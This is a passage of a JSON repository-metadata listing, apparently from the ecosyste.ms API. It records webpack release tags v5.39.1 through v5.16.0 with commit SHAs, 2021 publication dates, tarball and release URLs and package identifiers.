/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"